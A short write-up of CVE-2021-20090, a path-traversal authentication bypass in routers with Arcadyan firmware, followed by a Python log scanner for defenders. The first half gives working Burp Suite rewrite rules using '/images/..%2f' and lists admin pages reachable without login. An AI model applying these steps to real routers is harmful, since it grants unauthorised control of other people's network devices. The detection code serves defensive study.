CVE-2021-20090 Arcadyan Routers Authentication Bypass Vulnerability
Introduction
A path traversal vulnerability in the web interface of routers with Arcadyan firmware (Buffalo, etc.) can be exploited to bypass authentication.
Exploit
1. Open Burp Suite, go to the Proxy > Options tab, and add a Match and Replace rule that removes the path traversal string from the Referer request header.
Match /images/..%2f and replace it with /
2. Add another Match and Replace rule to prefix all URLs with images/..%2f.
Match GET / and replace it with GET /images/..%2f
3. Now browse the router's web interface pages through the Burp Suite proxy browser. All request URLs will be automatically modified by the proxy.
Some of the URLs which can be accessed without authentication:
http://targetip
http://targetip/info.html
http://targetip/log_log.html
http://targetip/lan_bridge.html
http://targetip/save_init.html
http://targetip/wireless_band2g.html
http://targetip/ap_password_access_date_ntp.html
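For defenders, the rewritten requests leave a recognizable trace: a request path that starts under /images/ but resolves to a page outside it. The following check is an added example, not part of the original post; it assumes combined-format HTTP request logs from a proxy or sensor in front of the router, and the function names and sample log lines are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Prefix taken from the write-up. Assumption: the device serves this
# directory without a session; extend the tuple for other such paths.
UNAUTH_PREFIXES = ("/images/",)
# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /images/logo.png HTTP/1.1" 200 512',
    '192.0.2.66 - - [01/Jan/2024:10:00:05 +0000] "GET /images/..%2finfo.html HTTP/1.1" 200 4096',
    '192.0.2.66 - - [01/Jan/2024:10:00:06 +0000] "GET /images/..%252flog_log.html HTTP/1.1" 200 2048',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /images/icons/../logo.png HTTP/1.1" 200 512',
]

def fully_unquote(path, max_rounds=3):
    """Percent-decode repeatedly so %252f-style double encoding is caught."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def resolve_bypass(target):
    """Return the page actually reached when `target` starts under an
    unauthenticated prefix but traverses out of it; otherwise None."""
    decoded = fully_unquote(urlsplit(target).path).replace("\\", "/")
    if ".." not in decoded.split("/"):
        return None
    resolved = posixpath.normpath(decoded)
    for prefix in UNAUTH_PREFIXES:
        if decoded.startswith(prefix) and not (resolved + "/").startswith(prefix):
            return resolved
    return None

def scan(lines):
    """Return (line_no, requested, resolved) for each suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        resolved = resolve_bypass(match["target"]) if match else None
        if resolved is not None:
            hits.append((number, match["target"], resolved))
    return hits
```

Traversal that stays inside /images/ (the last sample line) is not reported, which keeps ordinary relative asset links from raising alerts.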